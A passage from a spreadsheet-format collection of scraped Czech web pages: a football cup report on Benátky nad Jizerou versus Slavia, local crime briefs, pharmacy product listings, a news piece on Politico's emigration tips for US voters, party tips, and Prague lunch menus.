    <t>GÓÓL Benátek ! Jako vítězství v Lize mistrů Rubrika: Fotbal Sváteční zápas na třetiligový stadion přilákal tři a půl tisíce diváků. Domácí tým se proti lídrovi Chance Ligy držel, v závěru dokonce skóroval V nastaveném čase kopl Patrik Žitka do vrtule, na vlastní polovině sebral balon, prohnal se okolo Igoha Ogbua a přísnou ranou pravačkou snížil na 1:4. Střelec roztáhl ruce, stadion v Benátkách byl u vytržení. „Jako bych vyhrál Ligu mistrů,“ vydechl štěstím. Slavia si navzdory nezvládnuté závěrečné akci došla pro postup do osmifinále MOL Cupu. O výsledku rozhodla čtyřmi brankami v prvním poločase. BENÁTKY NAD JIZEROU – Do Benátek přijely rockové hvězdy v sešívaných barvách. Město bylo na nohou. Na historický fotbalový zápas se místní těšili od slavnostního losu. U stadionu vyrostly smontované tribuny, přibyly stánky s občerstvením, a protože se všichni nevešli okolo zábradlí podél hřiště, stálo se i na stráni nad hlavní tribunou. Pravou část obsadili slávističtí kotelníci, levou zhruba dvacítka místních nejhlasitějších. Celková návštěva? 3585 diváků! Nikdy v historii benátského klubu nenapočítal pokladník větší příjem ze vstupného. „Atmosféra byla skvělá, tahle pohárová kola jsou super pro menší týmy. Vždycky přijde hodně lidí, okolo zápasu se dělá spousta akcí,“ pochvaloval náladu na stadionu Mojmír Chytil, autor jedné branky. Pivo za padesát, klobása za kilo, párek na grilu za šedesát korun. Byť lidí na stadionu bylo mraky, nikde se nestály dlouhé fronty. I před zápasem byla organizace precizní. Výkop utkání byl přesně ve 14.00, chlapi si v práci museli vzít dovolenou, školy v Benátkách zavřely brzo po poledni. Bitva se Slavií byla pro město s necelými osmi tisíci obyvatel vysoce netradiční show. „Hned po losu zaplavila Benátky naprostá euforie, celé město tím žilo. Přijela spousta lidí z Prahy , samozřejmě i z Benátek . Kluci si vzali v práci dovolenou, na soupisce jsme najednou měli dvaadvacet hráčů. Nikdo nechtěl chybět,“ usmíval se domácí trenér Tomáš Staněk , někdejší blízký spolupracovník slávistického trenéra Jindřicha Trpišovského . Už před zápasem rozdali hráči spoustu podpisů, ochotně se fotili, s fanoušky se zastavili na krátké povídání. Když kráčeli improvizovanou uličkou z kabin na hřiště, s lidmi si tleskali, plácali. Poněkud zvláštní scéna nastala v poločasové pauze. Hráči porušili zvyklosti a místo kvapného odchodu do kabin dopřáli fanouškům několik podpisů a společných selfie. „Trochu mě to překvapilo,“ usmál se slávistický asistent Milan Kerbr. „Ale atmosféra byla skvělá, tolik lidí dává zápasu jinačí šmrnc, rádi se přišli podívat na hvězdy. Pohárová utkání jsem si užíval už jako hráč, nyní i v roli trenéra.“ Zápas měl klidný průběh, i proto, že favorit velmi brzo odskočil do čtyřbrankového trháku, atmosféra zhoustla jen jedinkrát ke konci utkání, kdy se na hlavní tribuně zvedly vášně a pár chlapů si začalo ručně vysvětlovat názorové rozdíly. „Prosím security, aby přišla na hlavní tribunu uklidnit situaci,“ poněkud zoufalým hlasem pravil spíkr. Za chvíli byl klid, všechno směřovalo k velkolepému vyvrcholení. Účetní zaskočil Ogbua Třetiligoví domácí spálili několik slušných šancí, dvakrát promarnili sólový nájezd, už to vypadalo, že odejdou s porážkou a bez vstřelené branky. V nastaveném čase to však přišlo. Tento okamžik se v Benátkách stane zaručeně legendou, která se bude vyprávět po generace. Patrik Žitka se ještě na vlastní polovině chopil míče a ve sprintu vyrazil bleskurychle vpřed. Deset metrů před bránou si účetní ze svijanského pivovaru hodil míč mezi Ogbua s Bužkem a neomylně trefil. V euforii nebyl jen on, ale celé Benátky . „Neuvěřitelný pocit. Jako bych vyhrál Ligu mistrů,“ popisoval slastný moment. V práci si musel vzít dovolenou, dnes ráno už ale bude zase zařezávat. „Pro pivovar nakupuju obalový materiál, musím být brzo v práci,“ usmál se. Krátce před brankou se těžce vydýchával ze dvou sprinterských soubojů s Ogbuem. Pak vzal nohy na ramena potřetí a hvězdě Chance Ligy ukázal záda. „Je to člověk jako já. V tu chvíli jsem byl nahoře sám, podstoupil jsem těžký sprinterský souboj, podařilo se mi ho předběhnout a zavěsil jsem,“ popisoval životní kariérní chvíli. „Ptal jsem se Jindry, zda Ogbu není zraněnej, že ho Patrik předběhl. Prej už byl jen unavenej,“ chechtal se Staněk . Jeho tým uhrál přijatelný výsledek 1:4. Zážitky zůstanou zaryté hluboko v paměti. „Chtěli jsme si to hlavně užít, nedostat moc branek. Výsledek není tak hrozný, jsme spokojení. Druhý poločas jsme dokonce vyhráli. Nikdy jsem nehrál před tolika lidmi, bylo to hrozně fajn,“ přikývl Žitka. O víkendu přijede do Benátek zase Sparta . Jen ta z Kolína . Středočeský klub zase najede na všední třetiligovou rutinu. BENÁTKY N. J.–SLAVIA 1:4 Branky: 90+2. Žitka – 14. Chytil, 16. Konečný, 27. Wallem, 31. Bužek. Rozhodčí: Všetečka – Leška, Novák. ŽK: Poběrežský – Zmrzlý. Diváci: 3585. BENÁTKY: Keller – Zabilanský, Kopa (46. Súkenník), Glöckner, Komma – Šimeček (46. Vobořil), Komárek, Hájek – Bodlák (71. Kohout), Macek (57. Žitka), Fabián (46. Poběrežský). Trenér: Staněk . SLAVIA: Mandous – Chaloupek, Ogbu, Konečný – Trédl (72. Prebsl), Pech (61. Masopust), Bužek, Zmrzlý (61. Toula ) – Jurásek (61. Schranz), Wallem – Chytil (60. Fila). Trenér: Trpišovský . PATRIK ŽITKA „Podstoupil jsem těžký sprinterský souboj, podařilo se mi ho předběhnout a zavěsil jsem.“ střelec Benátek o souboji s Ogbuem a gólu ČERVENOBÍLÁ STRÁŇ. Fotbalový areál v Benátkách nad Jizerou zažil neobvyklý nápor fanoušků. Tým Slavie dorazil na pohárový zápas podpořit dav příznivců. FOTO SPORT: PAVEL MAZÁČ (6X) KLID favoritovi zajistil už v úvodu Mojmír Chytil VIP FANOUŠEK Leoš Mareš nechyběl v Benátkách nad Jizerou MLADÍK Mikuláš Konečný slavil první trefu za áčko Slavie SLAVNÝ MOMENT. Patrik Žitka pláchl slávistickým hvězdám a radoval se z gólu. Autor: RADEK ŠPRYŇAR fotbalový expert deníku Sport radek.sprynar@cncenter.cz Autor Radek Šprynar Rubrika transition_slide Fotbal</t>
  </si>
  <si>
    <t>175000</t>
  </si>
  <si>
    <t>20241101_577_3241176582_931b49b7077d1bcbed14.html</t>
  </si>
  <si>
    <t>931b49b7077d1bcbed14</t>
  </si>
  <si>
    <t>SMS</t>
  </si>
  <si>
    <t>SMS Auto na střeše Zřejmě mokrá silnice překvapila řidičku, která cestou na Hřensko dostala smyk. Svůj vůz přímo na asfaltu převrátila na střechu. Vyvázla bez zranění. Řádně sjetý Hned dvěma ženám vulgárně nadával a vyhrožoval zbitím opilec a feťák (40) v Novém Malíně . S dvěma promile alkoholu , THC a pervitinem v žilách skončil na záchytce. Na hřišti s puškou Po dětském hřišti v České Lípě se procházel muž s puškou. Policie ho během dvou minut zadržela a spacifikovala. Zbraň byla airsoftová, její majitel byl pod vlivem drog. Vtip za tisíc Několik jídel si prostřednictvím on-line systému z místního občerstvení objednal neznámý vtipálek ze Zábřehu . Žádné z nich ovšem nepřevzal a vývařovně tak způsobil škodu přes tisíc korun. Foto HZS</t>
  </si>
  <si>
    <t>153000</t>
  </si>
  <si>
    <t>20241101_578_3240575989_d06589f7e2fe12dba536.html</t>
  </si>
  <si>
    <t>d06589f7e2fe12dba536</t>
  </si>
  <si>
    <t>HygienFresh multifunkční parfémované kuličky Květy bavlníku 2 ks</t>
  </si>
  <si>
    <t>HygienFresh multifunkční parfémované kuličky Květy bavlníku 2 ks Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky HygienFresh a nejlevnější získáte zdarma! Nabídka končí za Multifunkční parfémované kuličky jsou navrženy tak, aby vás jejich vůně doprovázela při každém vašem kroku. Jejich jedinečný design a složení zajišťují, že vůně je uvolňována rovnoměrně a dlouhodobě, aby vaše oblečení a prostředí zůstalo co nejdelší dobu svěže vonící. Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky HygienFresh a nejlevnější získáte zdarma! Nabídka končí za Cena za 1 ks: 159,50 Kč Můžete mít za 2 dny v neděli 10. 11. více info 5ks skladem V Pilulka Boxu již v neděli 10. 11. od 20:00 Pilulka Expresem již v neděli 10. 11. od 16:00 2+1 ZDARMA Multifunkční parfémované kuličky jsou navrženy tak, aby vás jejich vůně doprovázela při každém vašem kroku. Jejich jedinečný design a složení zajišťují, že vůně je uvolňována rovnoměrně a dlouhodobě, aby vaše oblečení a prostředí zůstalo co nejdelší dobu svěže vonící. Největší benefity produktu: Univerzální použití: Vhodné pro sušičky prádla, šatní skříně, botníky, prádelní zásuvky, do auta, do koupelny i do sportovní tašky Dlouhotrvající vůně: Kuličky jsou navrženy tak, aby uvolňovaly příjemnou a dlouhotrvající vůni. Pokud hledáte způsob, jak udržet vaše prádlo, skříně nebo místnosti čerstvé a voňavé po delší dobu, mohou být tyto kuličky ideálním řešením Rovnoměrné uvolňování vůně: Speciální design s širokou kontaktní plochou zajišťuje, že vůně se rovnoměrně uvolní během cyklu sušení Ekonomičnost: kuličky lze použít až pro 40 cyklů sušení pro každý kus, v prostředí domácnosti poskytují dlouhotrvající vůni a proto získáte hodnotu, která přesahuje vaši investici Snadné použití: jednoduše umístěte kuličku tam, kde chcete cítit její úžasnou vůni Upozornění Dráždí kůži. Může vyvolat alergickou kožní reakci. Způsobuje vážné podráždění očí. Toxický pro vodní organismy, s dlouhodobými účinky. Je-li nutná lékařská pomoc, mějte po ruce obal nebo štítek výrobku. Uchovávejte mimo dosah dětí. Zabraňte uvolnění do životního prostředí. Používejte ochranné rukavice/ochranný oděv/ochranné brýle/obličejový štít. PŘI STYKU S KŮŽÍ: Omyjte velkým množstvím vody a mýdla. Při podráždění kůže nebo vyrážce: Vyhledejte lékařskou pomoc/ošetření. Odstraňte obsah/obal jako nebezpečný odpad ve sběrném dvoře. Složení Butan, isobutan, propan, alkohol , parfém, tetramethylacetyloktahydronaftaleny, benzylsalicylát, hexyl cinnamal, amyl cinnamal, isougenol. Vyzkoušejte také další výrobky značky HygienFresh, které jsou v kategoriích Praní, Drogerie a Pilulka Friday. Pokud si nejste jistí volbou tohoto produktu, zkuste se ještě podívat do kategorie Sušení a žehlení. Ohodnoťte tento produkt jako první. EAN 8054729635359 Značka HygienFresh Velikost balení 2 ks Druh vůně Svěží Květinová Počet pracích dávek 80 Originální název A80-045 Parfémované koule víceúčelové vůně Květy bavlníky 2 ks Nejlepší akce a slevy ve vašem e-mailu</t>
  </si>
  <si>
    <t>20241101_579_3240576001_e45ba6394442c144ab44.html</t>
  </si>
  <si>
    <t>e45ba6394442c144ab44</t>
  </si>
  <si>
    <t>Erboristica UOMO Balzám po holení na citlivou pleť 100 ml</t>
  </si>
  <si>
    <t>Erboristica UOMO Balzám po holení na citlivou pleť 100 ml Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky Erboristica a nejlevnější získáte zdarma! Nabídka končí za Balzám po holení Erboristica Uomo zklidňuje pleť po holení a urychluje hojení drobných poranění. Zanechává pleť hladkou, hydratovanou a příjemně provoněnou. Akce: 2+1 nejlevnější ZDARMA Vložte do košíku 3 produkty značky Erboristica a nejlevnější získáte zdarma! Nabídka končí za Cena za 10 ml: 31,90 Kč Můžete mít za 2 dny v neděli 10. 11. více info 4ks skladem V Pilulka Boxu již v neděli 10. 11. od 20:00 Pilulka Expresem již v neděli 10. 11. od 16:00 Přírodní Napsat hodnocení Perfektně zahladí veškeré nežádoucí stopy po holení a dá vyniknout kráse čerstvě oholené mužské pleti. Balzám po holení Erboristica Uomo dokáže silou přírodních aktivních látek intenzivně regenerovat pleť, která následkem holení ztratila svou přirozenou ochrannou vrstvu. Má antiseptický účinek a urychluje hojení drobných poranění. Osvěžuje, zabraňuje svědění, hydratuje, vypíná a zjemňuje pleť. Neobsahuje alkohol . Balzám po holení Erboristica Uomo učiní vaši pleť neodolatelně hladkou a smyslně, diskrétně provoněnou. Kosmetika l’Erboristica di Athena´s spojuje moudrost přírody s elegancí, bez škodlivých přísad. Účinky: Zklidňuje podrážděnou pleť po holení Zabraňuje svědění a tvorbě pupínků Působí antisepticky Urychluje hojení drobných poranění Ošetřuje zanícenou a přecitlivělou pleť Typ pleti Vhodný pro všechny typy pleti. Jak aplikovat Po holení šetrně naneste dostatečné množství balzámu na obličej a krk a jemně promasírujte. Produkty l’Erboristica di Athena’s jsou pro každou pleť zcela bezpečné, protože: Neobsahují žádné zdraví škodlivé látky Byly dermatologicky testovány Neobsahují ropné deriváty, barviva, silikony, parabeny Jsou testovány na těžké kovy: nikl, chrom a kobalt &amp;lt;0,0001% Tento produkt je vhodný i pro vegany Nemají negativní dopad na životní prostředí Složení Aqua [water], aloe barbadensis leaf juice, coco-caprylate, glycerin, betaine, olus oil [olus], macadamia ternifolia seed oil, panthenol, panax ginseng root extract, ginkgo biloba leaf extract, phosphatidylcholine, bisabolol, hydrolyzed wheat protein, sodium salicylate, lysine, sorbitol, sodium pca, allantoin, tocopheryl acetate, diglycerin, urea, pca, lactic acid, sodium gluconate, parfum [fragrance], sodium hydroxide, peg-40 hydrogenated castor oil, benzoic acid, ethylhexylglycerin, acrylates/c10-30 alkyl acrylate crosspolymer, phenoxyethanol, dehydroacetic acid, limonene</t>
  </si>
  <si>
    <t>20241101_58_3264534626_844ebe1e77575b912584.html</t>
  </si>
  <si>
    <t>844ebe1e77575b912584</t>
  </si>
  <si>
    <t>Trump z Temu v Česku. Známý list radí příznivcům kandidátů, kam po volbách v USA emigrovat</t>
  </si>
  <si>
    <t>Trump z Temu v Česku. Známý list radí příznivcům kandidátů, kam po volbách v USA emigrovat Autor: ČTK , lig - 19:00 Příznivci republikána Donalda Trumpa a ani demokratky Kamaly Harrisové nemusí zoufat, pokud jejich kandidát v úterních amerických prezidentských volbách neuspěje - Evropa poskytuje dostatek útočišť pro oba tábory. Evropská mutace portálu Politico republikánům i demokratům nabízí hned několik států, kde se jim bude líbit. Republikánům doporučil Politico například Českou republiku , která má podle něj vlastní verzi Trumpa v podobě šéfa hnutí ANO a někdejšího premiéra Andreje Babiše . „Pokud jen přehlédnete několik menších odlišností - například oranžovou tvář - Česko nabízí svého vlastního obchodního magnáta, který se přeměnil v politického žháře: Andreje Babiše , který se brzy bude ucházet o návrat do vysokého úřadu,“ napsal Politico. V odkazu na Trumpovo volební heslo Make America Great Again (udělat Ameriku znovu skvělou) poznamenal, že Babiš chce zase skvělou učinit Českou republiku . „Před volbami v příštím roce mu preference rostou,“ uvedl. Babiše portál označil za velkého příznivce nápadů republikánského střihu, jako jsou radikální přistěhovalecká politika a sliby snížení daní. „Má dokonce červenou kšiltovku s nápisem silné Česko, která připomíná Trumpovy ikonické čepice Make America Great Again,“ vysvětlil server americkým čtenářům. „ Trump z Temu" „Stačí mu jen říkat Trump z Temu,“ dodal. Temu je čínský internetový prodejce, který je vyhlášený levnými alternativami dražších výrobků. Temu má ale problémy s kvalitou a bezpečností některých produktů. Krajně pravicové skupině Proud Boys („hrdí hoši“), která stojí za Trumpem, Politico vybral Durynsko na východě Německa . Zdůvodňuje to tím, že zde poprvé od prvního úspěchu ve 30. letech 20. století zvítězila nacistická strana, jak označil Alternativu pro Německo (AfD). „Zastánci nadřazenosti bílé rasy zde rovnou najdou spojence,“ dodal. Trumpově dělnické třídě by se podle Politika mohlo líbit v Maďarsku , které označil za nový průmyslový ráj s automobilkami a továrnami na baterie a s vyspělou čínskou technologií a kapitálem. „Bohužel nemůžete nosit zbraně tak svobodně jako v USA , ale není zde smrtonosnější zbraně než doma pálené pálinky (ovocná pálenka) - díky (Viktoru) Orbánovi osvobozená od daní,“ uvedl server. Demokraté do Francie Demokraté, kteří neuznávají hranice států, mohou po případném Trumpově vítězství zamířit na Baleárské ostrovy ve Středomoří. Vláda španělského premiéra Pedra Sáncheze se totiž vzpírá trendu států Evropské unie zpřísnit přistěhovalectví. „Demokraté toužící po životě s vínem a revolucí a po tom, aby jejich daně přispěly ke štědřejšímu sociálnímu státu, by mohli skončit ve Francii ,“ nabízí Politico s tím, že luxus by zase mohli chtít hledat na jihu na Riviéře. V tomto případě ale portál varuje, že přímořská oblast je střediskem krajní pravice. Jasno má Politico také v tom, kam by se mohli uchýlit anarchističtí flamendři a zelení nadšenci. Pro ty první vidí jako ideál Amsterodam , pro ekology zase Brusel , kde šéfka Evropské komise Ursula von der Leyenová slibuje dekarbonizovat hospodářství. „Jen se musíte připravit každý rok na zhruba osm měsíců nepřetržitého deště,“ dodal o unijní metropoli server. Video Politický marketér v Blesku o Fialově Tiktoku: Je to švihlý! Co mu radí dál? - Pavlína Horáková, Lukáš Červený Video se připravuje... roxin ( 3. listopadu 2024 07:04 ) Zvolí si koho chtějí! Příznivci Trumpa i Harrisové mohou po volbách podle Politika utéct do Evropy Babiš si nechal do kampaně vyrobit kšiltofky s heslem Silné Česko. Donald Trump létá v "Trump Force One" (říjen 2024). Komik Tony Hinchcliffe na mítinku Donalda Trumpa during v Madison Square Garden urazil Portoriko Předvolební mítink Donalda Trumpa v Novém Mexiku Trumpovi příznivci napjatě očekávají jeho vystoupení v Hendersonu v Nevadě Kamala Harrisová s volebním týmem v Air Force Two Viceprezidentka Kamala Harrisová létá v Air Force Two (říjen 2024). Raleigh, Severní Karolína : Kamala Harrisová v kampani Kamala Harrisová na předvolebním shromáždění v Michiganu Autor: Pavlína Horáková, ČTK, Lukáš Červeny, lig Autoři person Pavlína Horáková ČTK person Lukáš Červený person lig Rubrika transition_slide Svět</t>
  </si>
  <si>
    <t>20241101_580_3240571094_85050e02faeceb159cad.html</t>
  </si>
  <si>
    <t>85050e02faeceb159cad</t>
  </si>
  <si>
    <t>Tipy na nezapomenutelné dětské oslavy, které potěší jak děti, tak rodiče</t>
  </si>
  <si>
    <t>Tipy na nezapomenutelné dětské oslavy, které potěší jak děti, tak rodiče Veronika Kubátová · 1. 11. 2024 · 0 komentářů Dětské oslavy jsou jedním z největších potěšení, ale i výzev pro rodiče. Jak uspořádat oslavu, která okouzlí malé hosty a zároveň nebude stresující pro vás? Přečtěte si náš průvodce, ve kterém najdete tipy na zábavné aktivity, tematické dekorace a chutné pohoštění. Překvapivě, podle statistik se až 43 % dětí těší více na dort než na dárky! Obsah článku Nejlepší témata pro dětské oslavy Úžasné hry a aktivity pro děti Chutné a snadné pohoštění Nejlepší témata pro dětské oslavy Výběr správného tématu pro oslavu může být klíčem k úspěchu. Ať už se rozhodnete pro jednoduchou tematiku nebo něco složitějšího, děti si vždy užijí oslavu, která je kreativní a plná zábavy. Zde je několik oblíbených témat: 1. **Superhrdinové** – Děti milují hrdiny. Nabídněte jim možnost přijít v kostýmech svých oblíbených superhrdinů a připravte aktivity, které odrážejí jejich dovednosti. Například vytvoření „superhrdinské dráhy“ překážek, kde si mohou vyzkoušet své schopnosti. 2. **Morská víla vs. mořský vlk** – Téma, které osloví nejen malé holčičky, ale i kluky. Vytvořte dekorace s mořskými motivy a uspořádejte hry jako „lov pokladu“ na zahradě. 3. **Kralování a princezny** – Hlavně pro mladší děti je oblíbenou variantou oslavy s malou módní přehlídkou, kde se mohou proměnit ve své oblíbené postavy. Můžete připravit i šperky z korálků nebo dekorativní malování obličeje. 4. **Zvířata z džungle** – Inspirováno přírodou a zvířaty. Můžete vybavit oslavu plyšovými zvířátky a zahájit soutěže jako je „na koho se podobáš?“, kdy se děti snaží napodobovat různá zvířata. Úžasné hry a aktivity pro děti Nyní přichází na řadu zábava! Jakmile máte téma, nezapomeňte na hry a aktivity, které dodají vaší oslavě šťávu. Představte několik klasických i nových her, které si děti zamilují. 1. **Hledání pokladu** – Vytvořte mapu s pokladem, která povede děti na dobrodružství po celé zahradě nebo po vašem bytě. Zábavné úkoly a nápovědy mohou být spojeny s tématem oslav. 2. **Malování na obličej** – Přiveďte umělce, nebo si na to připravte barvy sami. Děti si mohou vybrat z mnoha motivů a odcházet s krásnými výtvory. 3. **Stavba pečiva** – Pro tematické oslavy, jako jsou piráti, připravte společné pečení „mořského“ pečiva a nechte děti tvořit vlastní poklady ze sladkého těsta. Překvapivě, některé děti raději hrají klasické hry, jako je „Člověče, nezlob se“ nebo „Kolo štěstí“. Vždy je dobré mít na paměti, že jednoduchost může přinést stejně velkou radost jako složitější aktivity. Chutné a snadné pohoštění Jedním z nejdůležitějších aspektů každé oslavy je jídlo. Chutné a zdravé pohoštění zajistí, že děti si oslavu užijí naplno. Jaké občerstvení je ideální? 1. **Mini sendviče** – Různé varianty sendvičů s šunkou, sýrem a zeleninou zajistí, že si děti pochutnají, aniž by obtěžovaly rodiče s náročnými jídelními požadavky. 2. **Ovoce na špejli** – Barevné kousky ovoce na špejli vypadají lákavě a zdravě. Můžete také přidat jogurtový dip, který jim dodá nový rozměr. 3. **Kreativní dorty** – Oslavy si žádají dort. Zapojte děti do vytváření vlastního malého dortu. Místo klasického krému můžete použít ovoce nebo tmavou čokoládu, čímž oslovíte jak zdravou stravu, tak chuť. Zajistěte, aby jídlo bylo atraktivní a snadno konzumovatelné, což pomůže zabránit nepořádku a nechtěným nehodám. Dětské oslavy mohou být skutečně výjimečné s trochou plánování, kreativity a chuti po zábavě. Promotion good relations with your child and their friends is key to creating lasting memories. Užívejte si čas strávený s dětmi a buďte si jisti, že právě tyto okamžiky utváří jejich dětství. Veronika Kubátová Autor: Veronika Kubátová Autor person Veronika Kubátová</t>
  </si>
  <si>
    <t>20241101_581_3240497290_d6c05ed4b80b2b813519.html</t>
  </si>
  <si>
    <t>d6c05ed4b80b2b813519</t>
  </si>
  <si>
    <t>Dušičkový večer s cimbálkou ve Valtickém Podzemí – Kudy z nudy</t>
  </si>
  <si>
    <t>Dušičkový večer s cimbálkou ve Valtickém Podzemí – Kudy z nudy Tato akce již proběhla a není tedy aktuální. Prohlédněte si aktuální akce v okolí této již neaktuální akce, prozkoumejte aktuální akce v regionu Jihomoravský kraj nebo navštivte Společenské akce v celé ČR . Víkendový večer trochu jinak. Nechte se překvapit a přijměte pozvání do sklepů Valtického Podzemí v atmosféře „dušiček“. Ochutnáte nejen dobrá vína , ale i speciality Valtického Podzemí. To vše za doprovodu cimbálové muziky k tanci i poslechu. Přelom října a listopadu je ve znamení Halloweenu a Dušiček. Je to období plné tajemných rituálů a podivuhodných setkání, při kterých se prolíná svět...</t>
  </si>
  <si>
    <t>20241101_582_3240575931_a175fc02bc9a6f2fe552.html</t>
  </si>
  <si>
    <t>a175fc02bc9a6f2fe552</t>
  </si>
  <si>
    <t>POLEDNÍ MENU – Pátek 1.11</t>
  </si>
  <si>
    <t>POLEDNÍ MENU – Pátek 1.11 Sobota, 9 listopadu, 2024 Novinky na Příkopech: Pražská čokoláda Steiner &amp;amp; Kovarik otevřela novou prodejnu v Palladiu Česká sklářská značka KLIMCHI vstupuje do centra Prahy . Svůj první kamenný obchod otevírá v secesním hotelu W Prague Marek &amp;amp; Friends v Trezoru Špork: Exkluzivní večer s master sommelierkou Laurou Rhys Alma Prague láká na silvestrovský večírek i voňavý advent Pražský Václavák: W Prague hotel včera otevřel v srdci Prahy své brány! **** PRAŽSKÉ PŘÍKOPY **** Největší a nejdelší nákupní lokalita v centru Prahy **** Dobře se najíst v centru Prahy na Pražských Příkopech je hračka, stačí si jen dobře vybrat… Poradíme vám kde a co si dnes můžete dát dobrého! POLEDNÍ MENU – Pátek 1.11. Obědové menu se podává ve všední dny v čase od 11:30 do 14:15 hodin. Polévky: Alpská kroupová | uzené koleno | mrkev | řapíkatý celer | brambory | křupavá šalotka – 85 Kč Kachní vývar | červená řepa | Madeira | krupičkové noky | pórek – 80 Kč Hlavní jídlo: Pečená dančí krkovice | 150g | hříbková omáčka | černý bez | celerové krokety | červená řepa – 245 Kč Cordon bleu z olivových kuřat | 200g | ementál | pražská šunka | máslová bramborová kaše | salát polníček | malinový dresink | marinované brusinky – 235 Kč Panenka z mladého vepře | 150g | cider velouté | celozrnná hořčice | karamelizovaná jablka | kadeřávek | suflé ze sladkých brambor Houbové lasagne | hřib smrkový | parmazán | salát polníček | malinový dresink | marinované brusinky – 230 Kč Pečené červené zelí | šalotka | lískové ořechy | vyšlehaná bryndza | nakládané ředkvičky | pak choi – 225 Kč Dezert: Mrkvový řez | Mascarpone krém | karamelizované ořechy – 75 Kč Speciální nabídka: V nabídce restaurace Červený Jelen na obědovém menu naleznete navíc ještě GRILL a A LA CARTE MENU i další dezerty. Celé obědové menu naleznete ZDE V ODKAZU. HYBERNSKÁ Obědové menu se podává ve všední dny v čase od 10:40 do 14:30 hodin. Polévky: ČOČKOVÝ KRÉM, krémová polévka z černé čočky s kořenovou zeleninou a opečenou houskou – 45 Kč ZELENINOVÁ POLÉVKA, z kuřecího vývaru se zašlehaným vejcem – 45 Kč Hlavní jídlo – Spodní kuchyně: KUŘECÍ PILAF, pečená jasmínová rýže promíchaná s kuřecím masem cibulí, česnekem, chorizem, kurkumou, kmínem a koriandrem – 144 Kč SMAŽENÝ SÝR GOUDA, smažený ve slunečnicovém oleji, podávaný s pečeným bramborem, máslem a tatarskou omáčkou – 149 Kč IRSKÝ HOVĚZÍ KOTLÍK, dušená hovězí kýta s česnekem, černým pivem , červeným vínem , kořením, rajčatovým pyré, tymiánem, kořenovou zeleninou a bramborami – 154 Kč KUŘE NA PAPRICE, pečený plátek kuřecího prsa s krémovou paprikovou omáčkou a pečenou jasmínovou rýží – 149 Kč KVĚTÁKOVÉ PLACIČKY, s vejcem, sýrem, bylinkami, bramborovou kaší a listovým salátem – 144 Kč CHILLI GULÁŠ Z VEPŘOVÉ PANENKY, minutkový guláš z vepřové panenky, podlévaný pivem s domácím škvarkovým knedlíkem a krájenou červenou cibulí – 154 Kč Hlavní jídlo – Horní kuchyně: GRILOVANÝ LOSOS, grilovaný steak z lososa se smetanovou omáčkou, brokolicí a těstovinami casarecce – 165 Kč MEDAILONKY Z JELENA, grilovaná panenka z jelena s omáčkou z červeného vína , šťouchaným bramborem a smaženou hlívou ústřičnou – 195 Kč Dezert: Sklenici filtrované neperlivé / perlivé vody, 0,25l – 10 Kč Čepovanou pomerančovou limonádu, 0,25l – 22 Kč Nealkoholické pivo Birell, 0,3l – 33 Kč V Celnici 1038/3, Praha 1 Obědové menu se podává ve všední dny v čase od 11:30 do 14:30 hodin. Polévka: Cibulový krém, kozí sýr – 85 Kč Předkrm: Tranche z chobotnice, majonéza z grilovaných citrónů, pohanka – 195 Kč Tarte flambée: Tarte flambée s modrým sýrem – 245 Kč Hlavní jídlo: Grilovaný lilek, dýně, miso, javorový sirup, kozí jogurt – 264 Kč Steak z tuňáka, gari omáčka, pak choi, pufované brambory – 379 Kč Pečené králičí stehno na hořčici, bylinkové špetzle – 297 Kč Hovězí rump steak, bordelaise omáčka, konfitovaná karotka – 358 Kč Dezerty: V Celnici 1028/10, Praha 1 Obědové menu se podává ve všední dny v čase od 12:00 do 15:00 hodin. Polévka: Marinovaný pstruh, řepa, kefír, výhonky – 130 Kč Listový salát, nakládané houby, jehličí, kombucha – 105 Kč Zvěřinová paštika, dýně, ostružiny, mandle – 115 Kč Hlavní jídlo: Kuřecí stehenní steak, šťouchané brambory, hříbková omáčka – 335 Kč Plněný paprikový lusk, rajská omáčka, rýže – 345 Kč Štikozubec, dýňové pyré, kadeřavá kapusta – 355 Kč Hrachová kaše, smažené houby portobello – 315 Kč Něco zdravého: Listový salát, domácí dresink – 135 Kč + Extra kuře nebo losos za 60 Kč / 90 Kč Dezert: Malinová pěna, mascarpone, lesní ovoce – 95 Kč Čokoládový cheesecake, jahody – 95 Kč Hruškový koláč, vanilková zmrzlina, ovoce – 95 Kč Výběr zmrzlin – 65 Kč Předkrm, hlavní jídlo a dezert dle výběru – 460 Kč CACAO PRAGUE V Celnici 1031/4, Praha 1 Polévka: Špíz z vepřové panenky s hranolky a domácí tatarkou – 179 Kč Rigatoni Arrabbiata – 159 Kč V Celnici 1031/4, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 15:00 hodin. Polévka: Mexická fazolová polévka se zakysanou smetanou – 55 Kč Hlavní jídlo: Tortilla plněná pikantní masovou směsí zapečená čedarem, bramborové chipsy – 189 Kč Cikánské rizoto sypané uzeným sýrem, rukola, 150 g – 179 Kč LOKALITA Obědové menu se podává ve všední dny v čase od 11:00 do 15:00 hodin. Polévky: Risotto s červenou řepou a šlehanou gorgonzolou – 169 Kč Hamburská vepřová kýta s bramborovým knedlíkem – 185 Kč Vinná klobása s bramborovou kaší a kyselou okurkou – 179 Kč Sépiové spaghetti s marinovaným lososem, cuketou a lilkem – 195 Kč Penne s hovězím masem a omáčkou ze zeleného pepře – 189 Kč Pizza: Pizza Funghi (24 cm) – tomato, mozzarella, italská šunka, žampiony, lanýžový olej – 175 Kč Pizza Formaggio (24 cm) – smetana, mozzarella, gorgonzola, špenát – 175 Kč Restaurace La Boca Česnečka s krutónem – 59 Kč Hlavní jídlo: Pečené kuře po katalánsku s cibulovou Jasmínovou rýží – 179 Kč Smažený telecí řízek, vařené brambory, okurkový salát – 215 Kč Variace salátu s grilovanými kachními prsy, zeleninou, pomerančovým vinaigrettem, salsou aioli, opečený kváskový chléb – 239 Kč Tapas plato – Vepřová krkovice, míchaný salát, marin. cibule, salsa Pico de Gallo , pita chléb – 229 Kč Dezert: Malý čokoládový dort – 65 Kč PIKNIK V DLOUHÉ Obědové menu se podává ve všední dny v čase od 11:00 do 15:00 hodin. Polévky: Denní polévka – v ceně menu Hlavní jídlo: Rozpečený hermelín, žampiony, toust – 165 Kč Chesseburger, hranolky – 175 Kč Řízečky z vepřové panenky, šťouchaný brambor se zakysanou smetanou a cibulkou – 245 Kč Nápoje k obědu: Horké limonády (pomeranč, hruška, zázvor, meruňka) – 55 Kč Domácí studené limonády (pomeranč, bezinka, 